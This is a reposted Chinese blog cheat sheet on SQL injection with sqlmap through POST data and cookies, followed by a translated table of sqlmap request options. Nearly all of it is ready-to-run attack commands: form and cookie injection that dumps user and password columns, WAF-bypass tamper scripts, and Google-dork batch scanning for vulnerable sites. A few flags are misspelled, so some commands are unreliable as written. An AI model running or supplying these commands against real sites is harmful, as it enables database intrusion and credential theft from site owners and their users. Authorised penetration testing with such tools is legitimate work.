SqlMap post cookie注入小結


sqlmap

SqlMap  POST注入

自動檢測
sqlmap -u “http://www.xxx.com/news?id=1″ –smart –level 3 –users

單個注入
sqlmap -u “http://www.xxx.com/1.php” –data=”id=1″

多個post值注入
sqlmap -u “http://www.xxx.com/vuln.php” –data=”query=foobar;id=1″ –param-del=”;” -f –banner –dbs –users

自動注入
sqlmap -u http://xxxx.xxxx.com/Login.asp –forms

導入文件注入
sqlmap -r key.txt “name,pass”  //不知道  key.txt 的位置

登錄post注冊

sqlmap -u “http://www.xxx.com/vuln.php” –data=”query=foobar;id=1″ –param-del=”;” –cookies=”登錄成功的cookie信息” -f –banner –dbs –users

SqlMap COOkie 注入

單個注入
sqlmap “http://127.0.0.1/base.php” –cookie “id=1″  –dbs –level 2
sqlmap -u “url” –cookie “id=” –clumns -T 表段 –level 2
sqlmap -u “url” –cookie “id=” –dump -T 表段 -C “user,pass” –level 2

偽靜態注入:

sqlmap -u url/x*.html –dbs

請求延時注入:
sqlmap –dbs -u usr/x*.html –delay 1(時間,可隨意)
sqlmap –dbs -u usr/x*.html –safe-freq 1(次數,可隨意)
————————————————————————–

繞過WAF防火牆:
sqlmap -u url -v 3 –dbs –batch –tamper “space2morehash.py”
1.space2hash.py 2.base64encode.py 3.charencode.py
————————————————————————–

Google批量檢測注入:
sqlmap -g 關鍵詞

 

Request(請求)::
這些選項可以用來指定如何連接到目標URL。

–data=DATA         通過POST發送的數據字符串
–cookie=COOKIE     HTTP Cookie頭
–cookie-urlencode  URL 編碼生成的cookie注入
–drop-set-cookie   忽略響應的Set – Cookie頭信息
–user-agent=AGENT  指定  HTTP User – Agent頭
–random-agent      使用隨機選定的HTTP User – Agent頭
–referer=REFERER   指定  HTTP Referer頭
–headers=HEADERS   換行分開,加入其他的HTTP頭
–auth-type=ATYPE   HTTP身份驗證類型(基本,摘要或NTLM)(Basic, Digest or NTLM)
–auth-cred=ACRED   HTTP身份驗證憑據(用戶名:密碼)
–auth-cert=ACERT   HTTP認證證書(key_file,cert_file)
–proxy=PROXY       使用HTTP代理連接到目標URL
–proxy-cred=PCRED  HTTP代理身份驗證憑據(用戶名:密碼)
–ignore-proxy      忽略系統默認的HTTP代理
–delay=DELAY       在每個HTTP請求之間的延遲時間,單位為秒
–timeout=TIMEOUT   等待連接超時的時間(默認為30秒)
–retries=RETRIES   連接超時后重新連接的時間(默認3)
–scope=SCOPE       從所提供的代理日志中過濾器目標的正則表達式
–safe-url=SAFURL   在測試過程中經常訪問的url地址


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM